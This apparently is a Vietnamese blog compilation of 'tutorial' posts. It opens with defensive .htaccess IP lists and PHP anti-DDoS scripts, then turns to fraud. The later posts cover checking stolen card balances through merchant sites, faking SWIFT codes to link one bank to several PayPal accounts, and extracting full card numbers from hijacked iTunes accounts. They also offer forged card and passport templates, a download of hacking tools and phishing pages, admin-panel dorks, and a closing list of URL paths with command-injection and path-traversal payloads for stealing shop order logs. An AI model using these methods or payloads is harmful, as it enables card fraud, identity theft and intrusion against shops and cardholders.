120.72.96.0/19 allow from 120.138.64.0/20 allow from 122.102.112.0/22 allow from 122.129.0.0/18 allow from 122.201.8.0/21 allow from 123.16.0.0/12 allow from 124.157.0.0/18 allow from 124.158.0.0/20 allow from 125.58.0.0/18 allow from 125.212.128.0/17 allow from 125.214.0.0/18 allow from 125.234.0.0/15 allow from 125.253.112.0/20 allow from 171.224.0.0/11 allow from 175.103.64.0/18 allow from 175.106.0.0/22 allow from 180.93.0.0/16 allow from 180.148.0.0/21 allow from 180.148.128.0/20 allow from 180.214.236.0/22 allow from 182.161.80.0/20 allow from 182.236.112.0/22 allow from 182.237.20.0/22  allow from 183.81.0.0/17 allow from 183.90.160.0/21 allow from 183.91.0.0/19 allow from 183.91.160.0/19 allow from 202.0.79.0/24 allow from 202.4.168.0/24 allow from 202.4.176.0/24 allow from 202.6.2.0/24 allow from 202.6.96.0/23 allow from 202.9.79.0/24 allow from 202.9.80.0/24 allow from 202.9.84.0/24 allow from 202.37.86.0/23 allow from 202.43.108.0/22 allow from 202.44.137.0/24 allow from 202.47.87.0/24 allow from 202.47.142.0/24 allow from 202.52.39.0/24 allow from 202.55.132.0/22 allow from 202.56.57.0/24 allow from 202.58.245.0/24 allow from 202.59.238.0/23 allow from 202.59.252.0/23 allow from 202.60.104.0/21 allow from 202.74.56.0/24 allow from 202.74.58.0/23 allow from 202.78.224.0/21 allow from 202.79.232.0/21 allow from 202.87.212.0/22 allow from 202.92.4.0/22 allow from 202.93.156.0/22 allow from 202.94.82.0/24 allow from 202.94.88.0/23 allow from 202.124.204.0/24 allow from 202.130.36.0/23 allow from 202.134.16.0/21 allow from 202.134.54.0/24 allow from 202.151.160.0/20 allow from 202.158.244.0/22 allow from 202.160.124.0/23 allow from 202.172.4.0/23 allow from 202.191.56.0/22 allow from 203.8.127.0/24 allow from 203.8.172.0/24 allow from 203.34.144.0/24 allow from 203.77.178.0/24 allow from 203.79.28.0/24 allow from 203.89.140.0/22 allow from 203.99.248.0/22 allow from 203.113.128.0/19 allow from 203.113.160.0/19 allow from 203.119.8.0/22 allow from 203.119.36.0/22 allow from 203.119.44.0/22 allow from 203.119.58.0/23 allow from 203.119.60.0/22 allow from 203.119.64.0/21 allow from 203.119.72.0/22 allow from 203.128.240.0/21 allow from 203.160.0.0/23 allow from 203.160.96.0/21 allow from 203.161.178.0/24 allow from 203.162.0.0/21 allow from 203.162.8.0/21 allow from 203.162.16.0/20 allow from 203.162.32.0/19 allow from 203.162.64.0/18 allow from 203.162.128.0/20 allow from 203.162.144.0/20 allow from 203.162.160.0/19 allow from 203.162.192.0/18 allow from 203.163.128.0/18 allow from 203.170.26.0/23 allow from 203.171.16.0/20 allow from 203.176.160.0/21 allow from 203.189.28.0/22 allow from 203.190.160.0/20 allow from 203.191.8.0/21 allow from 203.191.48.0/21 allow from 203.195.0.0/18 allow from 203.201.56.0/22 allow from 203.205.0.0/18 allow from 203.209.180.0/22 allow from 203.210.128.0/18 allow from 203.210.192.0/18 allow from 210.2.64.0/18 allow from 210.86.224.0/20 allow from 210.211.96.0/19 allow from 210.245.0.0/19 allow from 210.245.32.0/19 allow from 210.245.64.0/18 allow from 218.100.10.0/24 allow from 218.100.14.0/24 allow from 218.100.60.0/24 allow from 220.231.64.0/18 allow from 221.121.0.0/18 allow from 221.132.0.0/18 allow from 221.133.0.0/19 allow from 222.252.0.0/14 allow from 223.27.104.0/21

Save lại và upload lên host xong CHMOD 644 .

Kết quả: tất cả ip không nằm trong list được phép ( allow ) trong file .htaccess thì sẽ không truy cập được vào site bạn cũng như các tool ddos không thể kết nối đến site bạn. Dĩ nhiên là không có gì tuyệt đối nhé. Chứ BOTNET nó chỉ cần 1 lần connect server bạn phải - Deny 1 lần thế đủ xỉu.

Nếu bạn muốn làm ngược lại - nghĩa là cho phép tất cả truy cập loại trừ những IP không mong muốn thì nội dung của file

RewriteEngine on ErrorDocument 404 /404.html <Files ".htaccess"> allow from all </Files> order deny,allow allow from all  deny from 3.0.0.0/8 deny from 4.0.0.0/8 deny from 6.0.0.0/8 deny from 7.0.0.0/8 deny from 8.0.0.0/8 deny from 9.0.0.0/8 deny from list IP mà bạn muốn chặn

Sưu tầm

Read more »

Posted in: Thủ Thuật,Tutorial,Web Application

Cách chống doss khá hiệu quả

Share lại cách chống ddos này xem mà áp dụng nhé

Đầu tiên tạo file " chongddos.php "

<?php $cookie = $_COOKIE['yourcookie']; $othercookie = $_COOKIE['yourothercookie']; $othercookie = $_COOKIE['1211598493']; $othercookie = $_COOKIE['2c07863737b385b4c3567f0ecfa6d480']; $othercookie = $_COOKIE['3bc52aba5f6ed8a19cfafdc777ad1b1f']; if($cookie && $othercookie > 0) $iptime = 20; //so giay toi thieu giua cac lan truy cap. else $iptime = 10; // so giay toi thieu cho moi lan truy cap cho tat ca moi nguoi  $ippenalty = 60; // So giay truoc khi nguoi truy cap dc phep truy cap lai  if($cookie && $othercookie > 0)$ipmaxvisit = 30; //toi da truy cap tho $iptime else $ipmaxvisit = 20; // toi da cho moi lan truy cap $iptime  $iplogdir = "./iplog/"; $iplogfile = "iplog.dat"; $oldtime = 0; if (file_exists($iplogdir.$ipfile)) $oldtime = filemtime($iplogdir.$ipfile); $time = time(); if ($oldtime < $time) $oldtime = $time; $newtime = $oldtime + $iptime; if ($newtime >= $time + $iptime*$ipmaxvisit) { touch($iplogdir.$ipfile, $time + $iptime*($ipmaxvisit-1) + $ippenalty); $oldref = $_SERVER['HTTP_REFERER']; header("HTTP/1.0 503 Service Temporarily Unavailable"); header("Content-Type: text/html"); echo "<html><body bgcolor=#999999 text=#ffffff link=#ffff00> <font face='Verdana, Arial'><p><b> <h1>Temporary Access Denial</h1>Too many quick page views by your IP address (more than ".$ipmaxvisit." visits within ".$iptime." seconds).</b> "; echo "<br />Please wait ".$ippenalty." seconds and reload. Warning by KentMaster</p></font></body></html>"; touch($iplogdir.$iplogfile); //create if not existing $fp = fopen($iplogdir.$iplogfile, "a"); $yourdomain = $_SERVER['HTTP_HOST']; if ($fp) { $useragent = "<unknown user agent>"; if (isset($_SERVER["HTTP_USER_AGENT"])) $useragent = $_SERVER["HTTP_USER_AGENT"]; fputs($fp, $_SERVER["REMOTE_ADDR"]." ".date("d/m/Y H:i:s")." ".$useragent."\n"); fclose($fp); $yourdomain = $_SERVER['HTTP_HOST'];  if($_SESSION['reportedflood'] < 1 && ($newtime < $time + $iptime + $iptime*$ipmaxvisit)) @mail('ngothaiduong.info@gmail.com', 'Website is being flooded-DDOS from address '.$cookie.' ' .$_SERVER['REMOTE_ADDR'],''.$yourdomain.' are attacked refuse services from IP addresses '.$_SERVER['REMOTE_ADDR'].' attack to '.$yourdomain.$_SERVER['REQUEST_URI'].' Attaker is '.$oldref.' agent '.$_SERVER['HTTP_USER_AGENT'].' ' .$cookie.' '.$othercookie, "From: ".$yourdomain."\n"); $_SESSION['reportedflood'] = 1; } exit(); } else $_SESSION['reportedflood'] = 0; //echo("loaded ".$cookie.$iplogdir.$iplogfile.$ipfile.$newtim e); touch($iplogdir.$ipfile, $newtime); ?>

Trong đó , đổi địa chỉ email thành Email của admin hoặc ai quản lý host và domain cho forum .

- Upload file chongddos.php lên ngang hàng với index.php
- Mở các file cần bảo vệ : " index.php , showtheard.php , seach.php .... các file mà bọn nó qua đó có thể ddos mình đó . Chèn đoạn mã này sau thẻ < ?php

include 'chongddos.php';

- Sau đó tạo 1 thư mục có tên là /iplog/ và CHMOD là 777, bạn tạo tiếp 1 files
iplogfile.dat trong thư mục iplog và CHMOD là 666

Thế là xong .... Thử xem thế nào !

Dùng cái này có những lợi ích gì ?

- Cản ddos đc chút ít ( chả có cái gì chống được ddos cả )
- Gởi mail về thông báo khi bị ddos , IP thủ phạm ddos để có biện pháp xử lý .

Các bác tham khảo thêm trong mã file chongddos.php

Nice !

Read more »

Posted in: Thủ Thuật,Tutorial,Web Application

Auto lock ip khi bị ddos & attack

Default Code tự động lock ip khi bị ddos attack

Tránh được DDos bằng tools còn botnet thì chịu nha

đầu tiền lưu nội dung sau lưu lại với tên banip.php

Mã:

<?php$n = 5; / Chặn ip nếu 5 lần nhanh và liên tiếp truy cập vào 1 URL$ban = strpos($_SERVER['REQUEST_URI'], "vbshout.php")?0:1;$in = "\n".$_SERVER['REMOTE_ADDR']." - ".$_SERVER['REQUEST_URI'];$log = fopen('banip.log','a'); fwrite($log, $in); fclose($log);$list = file('banip.log',FILE_IGNORE_NEW_LINES &#124; FILE_SKIP_EMPTY_LINES);$last = count($list) - 1;if($last >1000) { $in = "Deny from all"."\n";$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock); }elseif($last > $n) { for($i = 1; $i < $n; $i++) if($list[$last - $i] != $list[$last]) $ban = 0;} else { $ban = 0; }if($ban) { $in = "Deny from ".$_SERVER['REMOTE_ADDR']."\n";$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock);}?>

vào file global.php nếu xài 4rum.
Cơ chế hoạt động
khi 1 ip gửi 1 request tới site của bạn. code sẽ tạo ra 1 file log ghi lại ip đó, và url mà ip đó truy cập.
Ví dụ : 113.22.70.69 - http://mydomain.com/4rum/index.php
nếu ip 113.22.70.69 truy cập nhanh và liên tiếp 5 lần vào cùng 1 url như trên thì code sẽ lock ip 113.22.70.69 bằng cách tạo ra 1 file htaccess và ghi lệnh deny from 113.22.70.69

Mã:

include 'banip.php';

Đoạn code tiếp theo

Mã:

if($last >1000) { $in = "Deny from all"."\n";

Khi 1 ip truy cập vào site. code sẽ ghi ip đó vào 1 dòng
Sau đó sẽ đếm tổng số dòng trong file log. nếu lớn hơn 1000 dòng trong 1 thời gian nhất định (Dấu hiệu bị tấn công bonet) thì sẽ ghi vào file htaccess lệnh deny from all
Các bạn có thể lập lịch xoá file htaccess và file log theo 1 thời gian quy định bằng cron job trong cpanel của host
Code:

Mã:

<?php if(file_exists('.htaccess')) unlink('.htaccess'); if(file_exists('banip.log')) unlink('banip.log'); ?>

Save đoạn code sau lại thành reset.php và up lên thư mục gốc. sau đó xài cron job để thực thi file reset.php theo 1 thời gian nhất định. Ví dụ 10 phút xoá file htaccess và file log 1 lần.

Code này chống ddos khá hiệu quả. nhưng với botnet thì thua vì khi có lệnh deny from all mặc dù apache sẽ ko kết nối đến cơ sở dữ liệu nhưng apache vẫn trả lời các request. . đó là trả về lỗi 403.
Khi apache phải trả lời hàng trăm ngàn reqest như thế các bạn biết điều gì sẽ xảy ra rùi đóa.

Các bác test thử rùi cho ý kiến nha. Em test thấy good. dùng tool tự ddos site mình. ddos đc vài giây là bị lock ip .

. Nguồn Sưu Tầm...

Read more »

Posted in: Thủ Thuật,Tutorial,Web Application

TUT để có Account Rapidshare 1 year dễ dàng!

Cái này cũng hay!Anh em mò xem sao nhé!
8 Ref để đổi 1 Account Rapidshare 1 Years!Ngoài ra còn nhiều account khác anh em cứ tự khám phá nhé!

À ngoài 8 Referral hình như còn phải complete 1 Offer Full Credit của nó nữa thì phải!But anh em mình có CC mà!


Trong lúc dạo trên mạng , tình cờ tìm được 1 trang rất hay muốn giới thiệu cùng mọi người tham gia, với tiêu chí giúp mọi người cũng như giúp chính mình vậy.

Với những người duyệt web thì đa số ai cũng biết RAPIDSHARE và MEGAUPLOAD, MAGASHARES.....và còn nhiều nữa.

Với trang web mà mình giới thiệu thì bạn có rất nhiều account của các trang chia sẻ hàng đầu thế giới hiện nay, ngoài 3 web mình nói ở trên còn PAYPAL, GAMESPOT , AMAZON.COM và còn nhiều để bạn tự khám phá.

Các bạn theo đường dẫn sau đây:
http://www.beepremium4free.com/?f=117243
ào trang web để đăng ký cho mình 1 account free và sau đó chia sẻ đường dẫn mà trang web sẽ cho mình, chia sẻ cho mọi người vào tham gia đăng ký thành công (rất dễ đăng ký chỉ cần bỏ ra 1 đến 2 phút là xong).

Hướng dẫn cách đăng ký:

Bước 1 đánh email và password , chọn quốc gia nào cũng được ko quan trọng vào khung bên phải phía dưới.

Bước 2 Điền đầy đủ thông tin nhưng quan trong nhất là email và password còn phía dưới ko quan trọng (vì nó sẽ gửi cho mình qua email)
zip code: hanoi 10000

Bước 3 Qua hộp mail kích hoạt accout hoạt động.
hết

Nếu muốn biết rõ cách thức hoạt thì sau khi đăng nhập vào, thì vào thẻ F.A.Qs xem nhé, nếu bạn nghĩ nó gửi cho mình như thế nào thì hãy yên tâm nó sẽ gửi (account và password) cho bạn qua email đó, vì vậy hãy cận thận email của mình nha.

Chúc bạn vui vẻ khi có trong tay 1 account nào mình muốn

Read more »

Posted in: Thủ Thuật,Tutorial

Add một bank vào nhiều PayPal

Tut vẫn là tut và nó chính là Tut
Đã có nhiều bro bị limit acc pp + bank trong đó và tự hỏi làm sao add bank vào acc pp khác đây
Thực ra việc add bank vào PP dựa vào cái gì nhỉ
Thứ nhất account number => ko fake được
Thứ 2 swift code => fake thoải mái
Với VCB
http://forum.vietmaker.com/threads/19223-M%C3%A3-SWIFT-v%C3%A0-address-c%C3%A1c-chi-nh%C3%A1nh-c%E1%BB%A7a-VCB.
Vào site đó một đống swift code
Cứ nhập các swift code của các tỉnh khác vào, bảo đảm rút tiền vẫn về bank mình
Các ngân hàng khác các bác tự tìm swiftcode của chi nhánh
Riêng Đông Á mình có search qua mà hình như chỉ có 1 swiftcode


đơn giản là tìm swiftcode của các chi nhanh cùng bank rồi nhập vào thay cho swiftcode chính của bank
ví dụ như VCB thường nhập swift code là BFTVVNVX
thì thay vào đó ta nhập BFTVVNVX 019 (cà mau)
hoặc BFTVVNVX 015 (an giang)
vào google ra một đống đó

Read more »

Posted in: Tutorial,UG

Check BL ccv bằng Authorize

ku Nic3 biếu mình 1 acc unlimited credit ở Nic3.biz mà bảo search paygate cho nó code tool mãi mà chưa search đc, hnay học xong rảnh ngồi search cho nó 1 tẹo, kiếm mãi chẳng ra site nào giống Gpal quay sang search Authorize cho ae ngồi mà check bl
chủ yếu share site là chính, cách check thì ai cũng biết rồi chẳng hide làm gì vì site ntn nhiều như cỏ dại duy nhất lưu ý anh em 1 điều: Authorize hold tiền ~> check xong để đó 2 - 3 ngày, sau 2 - 3 ngày check lại với balance nhỏ (tầm 10$), còn live thì hãy đem đi đâm. không biết cái này rồi lại có người bảo "check qua 1000$ mà đâm 50$ không qua" hoặc "hôm qua vừa check qua 2000$, hôm nay check lại 100$ cũng không qua"

site thì có nhiều, nhưng hầu hết đều giới hạn số lần check (thường là 5 lần), đưa ra ae lại ngại check tạm thời share 3 site không giới hạn số lần check đã, bao giờ ae fuck chán thì đưa tiếp

http://www.mightywallets.com/
http://www.tacticalpants.com/
http://www.tfsupplements.com/

Read more »

Posted in: Thủ Thuật,Tutorial,UG

Bank ver paypal

http://www.marketprosecure.com/meta-bank-card.html
(dork:"Metabank")
p/s: site này có vài cái hay lắm , ko phải chỉ là trang tổng hợp thôi đâu .

Anh em coi ai cần gì thì làm .Hihihi

Read more »

Posted in: Tutorial,UG

Tut check bill address có verify hay ko

hi
hôm nay mình bày các bạn các check bill address có được verify hay ko
cái này rất quan trọng trọng shipping vì khi bạn order cần đổi hỏi billing chính xác
thường thì các bạn hay check ở http://www.whitepages.com/

nhưng hôm nay mình xin giới thiệu các bạn thêm 1 site nữa
http://www.melissadata.com/lookups/AddressCheck.asp

Demo



cách check

điền info add + city + zip vào

nếu hiện lên add đã được verify nghĩa là add chuẩn

nếu tên chủ nhà trùng chủ thẻ ( trùng họ ) thì là bill chuẩn

Thấy hay leech về cho ae tham khảo chứ ko phải tut của mình nha

Read more »

Thay đổi Port của Remote Desktop

- Mặc định port của Remote Desktop là 3389 chuyển thành port 7777. Mở Regedit tìm đến đường dẫn:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
- Double Click lên PortNumber và chọn Decimal và nhập vào 7777
- Restart lại máy
- Kiểm tra: từ máy khác nhập địa chỉ IP của máy làm Terminal Server và thêm số Port vào. VD: 192.168.1.1:7777

Read more »

Posted in: Thủ Thuật

Lấy CC number từ Apple Account

+ Tut rất phù hợp với bé nào check dc acc vs là acc paypal vs là acc Itunes mà lại bị dính ver card


Cũng đơn giản thôi. Trước trong 1 lần check mailpass, gặp được vài cái Mail có tài khoản Paypal, nhưng do SOCK kém lên bị PP bắt Veriy bằng số thẻ CC.Mình quay lại kiểm trả inbox và thấy chủ Mail còn có Acc iTune, vào iTune thì thấy 4 số cuối trùng với 4 số của Paypal - nghĩa là cùng 1 thẻ.
Bước 1: - Change Country. Giả sử Acc đang là US thì đổi sang UK chẳng hạn. Sau đó nó sẽ xác nhận mấy cái điều khoản này nó. Đồng ý rồi ấn Ok là xong. Lúc này thường thì nó sẽ chuyển ta vào trang Edit Payment vì khi đó thông tin thanh toán không còn Match với Bank nữa. Nếu vì lý do nào đó nó không tự động thì ta vào trang quản ly Account ấn vào Edit Payment Infomation, lúc này số thẻ vẫn chưa hiện ra, ta đừng thay đổi gì cả mà cứ ấn vào cái nút Done Khi đó iTune nó sẽ báo lỗi địa chỉ và show hết cả số thẻ ra. Tất nhiên nó không Show CV2 :nonnay:





Bước 2: Copy số thẻ thôi chứ còn gì nữa

Read more »

Posted in: Hacking,Thủ Thuật,Tutorial,UG

Scan Credit Card

Tất cả những thứ bạn nên có để scan CC
Nguyên liệu gồm có: bộ font, file PSD, file PDF eng và vn ae tha hồ vọc
Các mẫu tem, mẫu logo...
Cũng tạm ổn nhỉ
Và rất nhiều thứ tớ sưu tầm để hết trong này anh em down về dùng thử nhé
http://www.mediafire.com/?dklkys1m2nqux7o
Ghi nhớ : Tut trong PDF là tut làm 1 scan mới chứ không phải chỉnh sửa, tuy nhiên đọc hết ae đem những mẫu có sẵn edit cũng đc
44MB lận, ae từ từ mà down
Thank nhé!

Read more »

Posted in: Download,Thủ Thuật,Tutorial,UG

Hướng dẫn tạo nút PayPal Donate (Quyên Góp) cho blog, web

Khi truy cập vào một số website bạn thường thấy trên web có nút Donate dùng để cho khách có nhu cầu quyên góp cho chủ website duy trì và phát triển web. Thường thì trường hợp có mạnh thường quân quyên góp là rất ích nhưng phải là không có. Để tạo được nút này, bạn cần phải có tài khoản PayPal Premier hoặc Business.
Các bước thực hiện
Tại giao diện tài khoản PayPal, bạn vào mục Merchant Services ở trên các tab.


Tiếp tục chọn mục Donations ở dưới góc phải.


Và bạn cần thực hiện 3 Step dưới đây để hoàn thành công việc
Step 1 Ở bước này bạn có một số lựa chọn như:
  - Use your own button image (dùng nút donate của riêng bạn)
  - Currency (loại tiền tệ)
  - Use my secure Merchant ID account (dùng ID của riêng account, bảo mật địa chỉ email).
  - Use my primary email address (công khai địa chỉ email).


Step 2 Save button at paypal (Bước này lưu các tuỳ chọn của bạn ở bước trên).

Step 3 Tuỳ chọn nâng cao
  - Can your customer add special instructions in a message to you? (bạn có thể điền 1 đoạn tin nhắn khi người khác quyên góp xong)
  - Take customers to this URL when they cancel their checkout (Điền địa chỉ khi khách huỷ bỏ cuộc quyên góp, có thể cho về địa chỉ trang chủ của bạn chẳng hạn http://thaiduong.info)
  - Take customers to this URL when they finish checkout (Địa chỉ khi khách thực hiện xong quyên góp )



khi đã hoàn thành xong các Step thì bạn click chọn Create Buntton hệ thống sẽ tự động tạo code cho bạn. Công việc còn lại là bạn chèn code đó vào vị trí thích hợp trên website của bạn và chờ mạnh thường quân đến quyên góp!

Read more »

Posted in: Thủ Thuật,Tutorial

ALL Tools Hack Shop & Tuts Shipped

Đi lòng vòng trên GG thì thấy cái này hay hay nên Leech về Share cho anh em Newbie. Mong rằng sẽ không trùng bài với ai! Ai thấy có ích thì cho xin cái THANK nha!

*Bộ Tools & Tuts được tổng hợp từ:
+ HKV Group
+ Newbie Group
+ DF Group
+ Google.com
........




Gồm có:
- Pangolin 3.0.01011
- darkMSSQL, darkMySQLi & darkjumper của darkc0de
- Havij 1.1
- MySQLi Dumper 3.6
- Web Cruiser Ent 2.1
- sqliHelper 2.7
- GH MD5 Cracker 1.0
- Admin Finder 1.0
- Exploit scanner 1.0
- prj Site Hack 1.0
- Blues Port Scan 5.0.2.1265
- M4xmssql & M4xmysql 1.0
- Tools Lọc EXP & Lọc Trùng
- String - ASCII, HEX, Binary Converter
- PeCompact - Unpacker, PEiD & OLLYDBG
- 140 shells của Xgr0up
- Passwords Pro 3.0
- RC4
- CC2Bank 1.3
- BSQL Hacker 9.0.0.7
- JSky Enterprise Edition 1.5.0.153
- HTTP request testing 1.0
- Encoder 1.0
- Demon - scan sub-domains 1.1
- Brute Force Test 1.0
- IIS Put Scanner 1.3
- Mars Banks Base 1.1
- Jet SQL Injection 2.5
- Edjpgcom (run file .php.jpg)
- All Phishing Pages
- SSH socks
- Photoshop (CreditCard, DriverLicense & Passport)

Và một số Tuts tổng hợp khác....
Tools:
SSH socks:
Photoshop:
All Phishing Pages:
Tuts:
Hacking:
Bin:
Doman-Hosting-Server-Reseller:
Jewelleries-Clothes-Chocolate:
Electroníc:
Other Tutorials:
Pass giải nén: forlornhope
Link Download: http://www.mediafire.com/?cqhjujdzmud

Read more »

Posted in: Download,Hacking,Thủ Thuật,Tutorial,UG

Tools reg mail

Reg đc Yahoo ,Gmail ,Live và AOL . Chỉ cần click vào Fill Info ,tất cả thông tin sẽ được điền đầy đủ vào các Textbox
Ở tab tiếp theo là công cụ hỗ trợ lọc ,chỉnh sửa text
http://www.virustotal.com/file-scan/report.html?id=0d17cf92c26a6bfc7ccb4f2b07083e04648da3c3e8ab461ecd34ab225fb74461-1311258849


http://www.mediafire.com/?lgu4mdobnqd9ogz
.Net Framework 2.0 trở lên mới run đc tool nhé

Read more »

Posted in: Download

GG dork login admincp và phpmyadmin

Này thì phpmyadmin:

inurl:/phpmyadmin/sql.php?

này thì admincp

intitle:"Index of? admin OR passwd
intitle:"Index of? admin OR accounts

Read more »

Posted in: Hacking,Tutorial

Hack CC bằng google

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other
isinglogorder.log
